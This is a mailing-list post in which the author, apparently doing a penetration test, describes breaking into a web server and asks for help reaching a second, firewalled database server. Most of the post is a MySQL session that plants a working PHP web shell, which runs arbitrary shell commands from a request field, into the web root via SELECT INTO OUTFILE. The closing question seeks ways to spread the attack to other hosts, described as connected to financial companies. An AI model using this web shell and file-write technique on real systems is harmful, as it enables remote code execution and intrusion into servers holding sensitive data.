SOME PENTISTING ROCK I HIT

[chuksjonia at gmail.com (chuks Jonia)]

Thanks Daniel for the reply

For the webserver lets say the I.P is 192.168.0.1, has port 3306 and
80 open. i was able to compromise this very fast, due to that pages
used at the Care Center server were almost the same, so i could read
the config php files. For the next server lets say 192.168.0.2 (though
on real world its a public I.P but protected by a netsceen from
public), its has webserver running, on 443 and 80, and connects to
some Financial companies, but its DB is running on another box,
192.168.0.3, (public i.p too but protected by netscreen too). This db
server has 3306 port open but no webserver running, but all the sequel
scripts are executing at the second private server.

Okey, for the first webserver, due to port 3306 and 80 open it was
easy to do this

mysql> CREATE TABLE chuks (codetab text);
ERROR 1046 (3D000): No database selected
mysql> use test
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> CREATE TABLE chuks (codetab text);
ERROR 1050 (42S01): Table 'chuks' already exists
mysql> DROP TABLE chuks;
Query OK, 0 rows affected (0.04 sec)

mysql> CREATE TABLE chuks (codetab text);
Query OK, 0 rows affected (0.05 sec)

mysql> INSERT INTO chuks (codetab) values ('<? $cmd =
$_REQUEST["-cmd"]; ?><html><head><title>Exec Shell code :: by
chuks</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form
method=POST><br><input type=TEXT name="-cmd" size=64
value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd);
?></pre></form></body></html>');
Query OK, 1 row affected (0.06 sec)

mysql> SELECT * INTO OUTFILE '/var/www/html/wap/shell.php' from chuks;
Query OK, 1 row affected (0.04 sec)

The question is, is there anyway i can write to another server if i
select into outfile on that path, and how can i do it.



/Chuks